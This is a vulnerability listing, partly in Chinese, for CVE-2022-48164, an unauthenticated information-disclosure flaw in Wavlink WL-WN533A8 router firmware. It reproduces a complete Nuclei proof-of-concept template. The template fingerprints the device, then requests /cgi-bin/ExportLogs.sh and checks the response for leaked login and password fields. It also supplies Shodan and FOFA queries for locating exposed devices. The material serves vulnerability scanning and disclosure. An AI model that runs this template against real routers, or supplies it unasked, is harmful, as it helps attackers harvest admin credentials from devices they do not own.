CVE-2022-48164: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure

日期: 2025-08-01 | 影响软件: Wavlink WL-WN533A8 M33A8.V5030.190716 | POC: 已公开

漏洞描述

An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.

PoC代码[已公开]

id: CVE-2022-48164

info:
  name: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
  impact: |
    Successful exploitation could lead to sensitive information disclosure.
  reference:
    - https://docs.google.com/document/d/1JgqpBYRxyU0WKDSqkvi4Yo0723k7mrIUeuH9i1eEs8U/edit?tab=t.0
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48164
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-48164
    epss-score: 0.81986
    epss-percentile: 0.99165
    cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wl-wn533a8_firmware
    shodan-query: html:"WN533A8"
    fofa-query: body="WN533A8"
  tags: cve,cve2022,wavlink,exposure,wn533a8

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "WN533A8")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009ea9a1c04651265d9ea09c47fca7e3409112675f396e389face7fe2bfe3a487802204b258f58918fdfab222fd57ff24693e6fc792b890c0f67e887c73583e1bd8ace:922c64590222798bb761d5b6d8e72950

相关漏洞推荐